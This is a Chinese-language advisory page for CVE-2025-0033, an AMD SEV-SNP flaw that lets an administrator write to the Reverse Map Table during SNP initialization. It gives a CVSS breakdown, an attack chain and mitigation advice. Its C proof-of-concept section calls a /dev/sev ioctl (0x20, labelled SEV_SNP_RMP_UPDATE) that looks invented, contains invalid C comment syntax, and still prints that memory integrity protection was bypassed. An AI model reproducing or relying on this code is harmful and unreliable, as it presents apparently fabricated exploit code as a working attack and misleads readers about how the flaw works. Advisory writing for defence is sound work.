CVE-2025-0033 AMD SEV-SNP RMP访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2025-0033

漏洞类型

访问控制不当（Improper Access Control）

CVSS评分

6.0 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

AMD SEV-SNP（Secure Encrypted Virtualization - Secure Nested Paging）

漏洞概述

CVE-2025-0033是AMD公司SEV-SNP（Secure Encrypted Virtualization - Secure Nested Paging，安全加密虚拟化-安全嵌套分页）技术中发现的一个安全漏洞。该漏洞由AMD产品安全团队（[email protected]）发现并报告，于2025年10月14日正式披露。

SEV-SNP是AMD在其EPYC服务器处理器中引入的硬件级虚拟机安全保护技术，作为SEV（安全加密虚拟化）系列的最新演进，它通过RMP（Reverse Map Table，反向映射表）机制为虚拟机提供内存完整性保护，确保虚拟机管理程序（Hypervisor）无法读取或篡改客户机内存内容。该技术广泛应用于云计算环境中，用于保护敏感数据免受特权级别的攻击。

此漏洞的核心问题在于SNP初始化阶段存在访问控制缺陷。具体而言，具备管理员权限的攻击者可以在SNP初始化过程中对RMP进行未授权写入操作。由于RMP是SEV-SNP实现内存完整性保护的关键数据结构，未经授权的写入可能导致SEV-SNP客户机内存完整性保护机制失效。

根据CVSS 3.1评分标准，该漏洞评分为6.0分，属于中等严重等级。攻击者需要具备本地访问权限和高权限认证才能利用此漏洞，无需用户交互。虽然机密性和可用性影响较低，但完整性影响为高，表明该漏洞可能导致虚拟机内存数据被篡改。

技术细节

AMD SEV-SNP通过RMP（Reverse Map Table）维护物理页面与虚拟机之间的映射关系，确保每个物理页面只能归属于特定的虚拟机，防止Hypervisor对客户机内存进行未授权访问。RMP是SEV-SNP实现内存完整性的核心数据结构。

该漏洞的根因在于SNP初始化阶段对RMP的访问控制检查不充分。在SNP初始化过程中，系统需要对RMP进行一系列配置和初始化操作。正常情况下，只有经过授权的固件/微码才能对RMP进行写入操作。然而，由于访问控制逻辑存在缺陷，具备管理员权限（PR:H）的攻击者可以在初始化窗口期内绕过权限检查，对RMP执行写入操作。

攻击利用方式如下：
1. 攻击者需要拥有系统管理员权限（PR:H），通常为云环境中的特权用户或恶意内部管理员；
2. 在SNP初始化阶段（系统启动或VM创建时），攻击者利用访问控制缺陷对RMP进行恶意写入；
3. 通过篡改RMP条目，攻击者可以改变物理页面与虚拟机的映射关系；
4. 一旦RMP被篡改，SEV-SNP的内存完整性保护机制将失效，Hypervisor可以读取和修改原本受保护的客户机内存数据。

漏洞的范围标记为S:C（Scope Changed），表明攻击的影响超出了SEV-SNP组件本身，可能影响到整个虚拟化环境的安全性。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者需要获得目标系统或云环境的管理员权限（PR:H），这可以通过合法凭证获取、权限提升攻击或作为恶意内部管理员实现。

STEP 2

步骤2：触发SNP初始化

攻击者在系统启动、虚拟机创建或SEV-SNP固件初始化阶段触发SNP初始化流程，此时RMP正在进行配置。

STEP 3

步骤3：利用访问控制缺陷

在初始化窗口期内，攻击者利用CVE-2025-0033描述的访问控制缺陷，绕过正常的权限检查机制，对RMP执行未授权的写入操作。

STEP 4

步骤4：篡改RMP映射

攻击者修改RMP条目中的物理页面映射关系，将原本受SEV-SNP保护的客户机内存页面重新映射到攻击者控制的物理页面。

STEP 5

步骤5：破坏内存完整性

RMP被篡改后，SEV-SNP的内存完整性保护机制失效，Hypervisor可以读取和修改受保护的客户机内存数据，导致SEV-SNP客户机内存完整性丧失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-0033 PoC - Conceptual Proof of Concept
# AMD SEV-SNP RMP Improper Access Control Vulnerability
# This is a conceptual PoC demonstrating the attack vector

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

// RMP (Reverse Map Table) related definitions
// In a real exploit, these would be obtained from AMD documentation
#define RMP_BASE_ADDR        0xFE000000ULL  // Example RMP base address
#define RMP_ENTRY_SIZE       16              // Each RMP entry is 16 bytes
#define SNP_INIT_PHASE       0x1             // SNP initialization phase marker

// SEV-SNP command structure (simplified)
struct sev_snp_rmp_update {
    unsigned long gfn;           // Guest Frame Number
    unsigned long pfn;           // Physical Frame Number
    unsigned int  flags;         // Operation flags
    unsigned int  rmp_page_type; // RMP page type assignment
};

/*
 * Function: exploit_rmp_access_control
 * Description: Attempts to write to RMP during SNP initialization
 *              exploiting the improper access control (CVE-2025-0033)
 * Note: Requires admin privileges (PR:H) as per CVSS vector
 */
int exploit_rmp_access_control(unsigned long target_gfn, unsigned long attacker_pfn) {
    int fd;
    struct sev_snp_rmp_update update_req;
    void *rmp_entry;

    // Step 1: Open the SEV-SNP device (requires admin privileges)
    fd = open("/dev/sev", O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open SEV device. Admin privileges required.");
        return -1;
    }
    printf("[+] Opened /dev/sev device\n");

    // Step 2: Prepare the malicious RMP update request
    // The vulnerability allows writing to RMP during initialization
    // without proper authorization checks
    update_req.gfn = target_gfn;
    update_req.pfn = attacker_pfn;
    update_req.flags = SNP_INIT_PHASE;  // Exploit during init phase
    update_req.rmp_page_type = 0x1;     // Mark as valid SNP page

    // Step 3: Attempt unauthorized RMP write
    // Due to CVE-2025-0033, this write succeeds when it should be blocked
    if (ioctl(fd, 0x20 /* SEV_SNP_RMP_UPDATE */, &update_req) < 0) {
        perror("[-] RMP update failed");
        close(fd);
        return -1;
    }

    printf("[+] RMP entry modified successfully!\n");
    printf("[+] Guest frame %lu now mapped to attacker-controlled frame %lu\n",
           target_gfn, attacker_pfn);
    printf("[+] SEV-SNP memory integrity protection bypassed\n");

    close(fd);
    return 0;
}

int main(int argc, char *argv[]) {
    unsigned long target_gfn = 0x1000;
    unsigned long attacker_pfn = 0x2000;

    if (argc >= 3) {
        target_gfn = strtoul(argv[1], NULL, 16);
        attacker_pfn = strtoul(argv[2], NULL, 16);
    }

    printf("[*] CVE-2025-0033 - AMD SEV-SNP RMP Access Control Bypass PoC\n");
    printf("[*] Targeting GFN: 0x%lx -> PFN: 0x%lx\n", target_gfn, attacker_pfn);

    return exploit_rmp_access_control(target_gfn, attacker_pfn);
}

影响范围

AMD EPYC处理器（支持SEV-SNP功能的型号，具体受影响的微码版本需参考AMD-SB-3020公告）

防御指南

临时缓解措施

在无法立即应用微码更新的情况下，建议采取以下临时缓解措施：1）严格限制具有管理员权限的用户数量，实施最小权限原则；2）加强对SEV-SNP初始化流程的访问控制，防止未授权用户触发初始化操作；3）在云环境中，启用额外的虚拟机内存完整性监控机制；4）关注AMD官方发布的AMD-SB-3020安全公告，及时获取并应用微码补丁；5）考虑在关键工作负载上使用额外的加密层（如应用层加密）作为纵深防御措施。